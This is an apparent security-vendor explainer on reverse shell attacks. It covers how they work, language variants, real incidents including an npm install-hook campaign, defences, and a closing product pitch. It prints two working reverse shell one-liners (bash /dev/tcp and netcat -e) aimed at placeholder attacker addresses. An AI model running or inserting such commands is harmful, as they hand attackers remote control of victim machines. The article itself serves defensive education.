Uncover hidden risks

Watch how the Wiz platform can expose unseen risks in your cloud environment without drowning your team in alerts.

What is a Reverse Shell Attack?

A reverse shell attack is a type of cyberattack where a threat actor establishes a connection from a target machine (the victim's) to their machine.

Wiz Experts Team
6 min read

What is reverse shell?

A reverse shell attack is a type of cyberattack where a threat actor establishes a connection from a target machine (the victim's) to their machine. Reverse shell attacks are often executed via TCP and, in rare cases, ICMP or UDP. The goal of a reverse shell attack is to provide the attacker with unauthorized remote access to redirect outgoing connections from the network of the remote host (the victim). 

With control of a victim’s machine and communications, the attacker can steal or modify data, inject malware, or further escalate their access within the victim's network. The stakes are high: Public disclosure of the attack can lead to loss of customer trust, negative media attention, diminished brand reputation, regulatory fines, and revenue loss. 

Let’s explore reverse shell attacks in greater detail and then discuss proactive measures you can take to protect your organization.

How does reverse shell work?

Reverse shell attacks exploit command injection vulnerabilities. They occur in three phases: connection initiation, reverse shell, and command injection. Here’s how it works:

  1. Attackers compromise target systems by remote code execution that exploits system vulnerabilities—e.g., port forwarding and open ports. Because firewall rules are easier to bypass on open ports, attackers can gain access through ports such as port 80 or 443, which are often open by default.

  2. Next, attackers deploy a payload that establishes a connection from the victim's machine to a remote machine. The attacker’s remote systems listen and accept the request, allowing them administrative access to exploit victims’ systems. Since the connection is outgoing, security mechanisms that detect only incoming connections can be bypassed. (This is an important difference between reverse shell and bind shell. Unlike reverse shell, bind shell may be easier to discover, as the connection is initiated by the attacker's system.) 

  3. To maintain persistent access, attackers bypass network filtering through port forwarding. Attackers may also use proxy servers or tunneling techniques to obscure the origin of their connection. To conceal malicious communication, attackers use encryption, but this adds an extra handshake to the process, which makes it even harder to detect the communication flow. 

Examples of reverse shell

Read on for examples of reverse shell methods and how they are executed:

  • Bash reverse shell: Bash reverse shell is a Unix shell that is carried out using a simple one-line command. For example:

```bash

bash -i >& /dev/tcp/attackers_ip/attackers_port 0>&1

```

In this command, /dev/tcp/attackers_ip/attackers_port represents the IP address and port number the reverse shell will connect to.

  • Java reverse shell: Java reverse shells are implemented using libraries such as java.net.Socket. This attack involves establishing a socket connection to the threat actor's server to enable remote command execution.

  • Netcat reverse shell: An example of a Netcat reverse shell is

```bash

nc -e /bin/sh attackers_ip attackers_port

```

In this command, Netcat executes a shell connection to the specified IP address and port to establish a reverse shell.

  • Perl reverse shell: The IO::Socket module is commonly used to initiate a Perl reverse shell connection, enabling bidirectional communication between victims’ and attackers’ systems.

  • PHP reverse shell: For PHP reverse shells, the attacker uses PHP's socket functions (open and exec) to open a connection from a victim’s system to their system. The threat actor then executes commands to redirect communication to their system.

  • Python reverse shell: Python provides robust networking capabilities, making it well-suited to creating reverse shell connections. A Python reverse shell involves using the “socket” library to create a socket connection.

  • Ruby reverse shell: A Ruby reverse shell attack involves creating a socket connection to the attacker's server and establishing bidirectional communication for executing commands in a victim's system.

Real-world examples of reverse shell

In most cases, hackers successfully execute reverse shell attacks because target systems are vulnerable. This is often worse in supply-chain attacks due to the large number of unsuspecting enterprises depending on cloud service providers. To execute such large-scale attacks, hackers release malicious packages, which, once installed, trigger the victims’ machines to establish reverse shell connections to the attackers’ machines. The packages may be disguised as software updates or other harmless-seaming packages. 

Let’s consider three real-life scenarios:

1. #BrokenSesame vulnerability in Alibaba PostgreSQL databases

The Wiz Research team secured backdoor access to two Alibaba cloud PostgreSQL databases: ApsaraDB RDS and AnalyticDB. The backdoor was a container vulnerability, #BrokenSesame, caused by inadequate container isolation and an accidental “write” permission to a private registry. 

This access could have allowed threat actors to compromise the Alibaba supply chain, execute “write” operations on customers’ registries, and release reverse shell packages disguised as software updates. 

2. Hell's Keychain vulnerability in IBM Cloud PostgreSQL databases

The Wiz Research team leveraged a privilege escalation vulnerability named "Hell's Keychain" in IBM’s Cloud PostgreSQL database to uncover a set of vulnerabilities that could have allowed attackers to read and modify the data stored in IBM’s PostgreSQL databases. 

The vulnerabilities include the Kubernetes service account token, the private container registry password, CI/CD server credentials, and overly permissive network access to internal build servers. If exploited, they would have exposed IBM customers to supply-chain attacks. (If this sounds familiar, it’s because this is similar to the ExtraReplica vulnerability, where Wiz researchers gained superuser privileges in a Azure PostgreSQL database.)

3. npm reverse shell vulnerability

In October 2023, a group of security researchers discovered 48 malicious package.json files published by an npm user. The packages were disguised as legitimate files with innocuous names and were equipped with install hooks that trigger reverse shell commands to rsh.51pwn[.]com once the packages are installed. 

After installation, a new process is automatically created (independent of the parent process, to avoid detection). The process runs the Java reverse shell script "scripts/rsh.js" in a detached mode and uses filterNet to discover IPv4 addresses that can be used to initiate a reverse shell connection through the compromised host system. The moment the reverse shell connection is established, the hacker (identified as hktalent) can potentially access the compromised organization’s systems, networks, and sensitive data.

Reverse shell attack prevention and detection tips

Here are eight strategies to tackle reverse shell attacks:

1. Complete regular security audits

Using automated AI-based tools, conduct regular vulnerability scanning and penetration testing to uncover potential entry points and misconfigurations. When you simulate real-world attacks, you can measure the effectiveness of your security investments. 

2. Prioritize dependency management

Beware of software dependencies containing malicious code. Choose dependencies from carefully maintained repositories only, and verify software package names. Use AI-powered software composition analysis (SCA) tools to scan open-source packages before installation. The tool you choose must empower you to scan dependencies swiftly, identifying vulnerabilities in both installed and yet-to-be-installed software. It should also rank the vulnerabilities in order of priority.

3. Implement regular patch management

Keep your apps up to date with the latest security patches to apply fixes for known vulnerabilities that could be exploited to establish reverse shell connections. Staying updated also reduces your attack surface.

4. Focus on host-based and container security practices

Implement host-based security measures—including proper configuration management, least-privilege access control, and secure containerization. Container security keeps malicious actors from scraping container registries and isolates containers from one another to prevent lateral movement.

5. Maintain stringent access and network control

Enforce the principle of least privilege to ensure that users and apps have only the necessary access to perform specific tasks. As discovered in the Alibaba hack above, over-privileged accounts empower attackers to escalate their access. Utilize network segmentation to limit unauthorized communications and lateral movement within your network.

6. Leverage log monitoring and behavioral analysis

By actively monitoring system logs, including network traffic logs and command execution logs, you can detect suspicious activities and respond proactively. A centralized log monitoring tool backed by behavioral analysis technologies will help you analyze user and system behaviors to identify deviations from normal patterns.

7. Use firewalls and IDSes

Utilize advanced firewalls with eBPF functionalities. Unlike basic firewalls that control only incoming network traffic, eBPF configures your firewalls to manage outgoing traffic and detect reverse shell attacks. Additionally, implement an intrusion detection system (IDS) to complement firewalls. IDSes detect and alert on anomalous activities, such as unexpected outbound connections or unusual traffic patterns.

8. Employee education

Employee training helps increase awareness of cybersecurity threats, including social engineering tactics that may lead to reverse shell attacks. Encourage your employees to adopt secure practices, such as only clicking on verified links and leaving suspicious emails unread. Teach teams to recognize suspicious activities and report potential incidents (e.g, unauthorized access or data breaches).

Conclusion

Reverse shell attacks can have devastating consequences, but you can protect your organization. Prioritize defense against reverse shell attacks by investing in security solutions that implement the tips we’ve discussed in this article. 

Enter Wiz. With our advanced threat detection capabilities and comprehensive defense-in-depth strategy against reverse shell attacks, Wiz is your ideal solution. Request a demo today to gain real-time visibility into your cloud environments and detect and resolve any indicators of reverse shell attacks.

A single platform for everything cloud security

Learn why CISOs at the fastest growing companies choose Wiz to secure their cloud environments.

Get a demo

Continue reading

SBOM Security

A Software Bill of Material (SBOM) is a comprehensive inventory that details every software component that makes up an application.

What is a man-in-the-middle attack?

Wiz Experts Team

A man-in-the-middle (MitM) attack is a type of cyberattack where a hacker intercepts data transferred between two parties.

Kubernetes secrets

A Kubernetes secret is an object in the Kubernetes ecosystem that contains sensitive information (think keys, passwords, and tokens)

What is containerization?

Containerization encapsulates an application and its dependencies into a container image, facilitating consistent execution across any host operating system supporting a container engine.

Containers vs. VMs: What’s the difference?

Wiz Experts Team

In a nutshell, containers and virtual machines (VMs) are two inherently different approaches to packaging and deploying applications/services in isolated environments.